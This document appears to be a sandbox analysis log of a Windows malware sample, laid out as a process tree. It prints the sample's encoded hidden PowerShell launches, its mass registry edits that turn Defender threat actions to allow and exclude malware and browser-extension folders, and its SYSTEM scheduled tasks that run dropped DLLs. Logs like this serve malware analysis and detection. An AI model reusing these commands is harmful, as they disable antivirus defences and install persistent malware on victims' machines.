C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4788 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4032
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3724
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3292
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2116
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe id /KZsite_idnXc 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2400
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4208
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1508 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:3024
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:1296
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:3808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:1920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:4100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:3732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:3112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:3452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:323⤵PID:3720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:643⤵PID:1228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:323⤵PID:2856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:643⤵PID:5008
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMvUkTVLF" /SC once /ST 01:37:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMvUkTVLF"2⤵PID:3320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMvUkTVLF"2⤵PID:2928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 10:59:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe\" Ty /Pisite_idaaw 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mRaseIvrfxDtBOYKW"2⤵PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4276 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2744
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2840
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2556
-
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exeC:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe Ty /Pisite_idaaw 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:4732 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"2⤵PID:3876
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2944
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1232
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2480
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\jplHxo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\UnqLSRy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eGwAoTnpAObQfPU"2⤵PID:2800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eGwAoTnpAObQfPU"2⤵PID:3188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\NANOZXe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\UlQFaef.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\tnLDIQD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\feITmxR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 11:38:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll\",#1 /pvsite_idqjm 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FTXCzbcEvROqagNdd"2⤵PID:4624
-
-
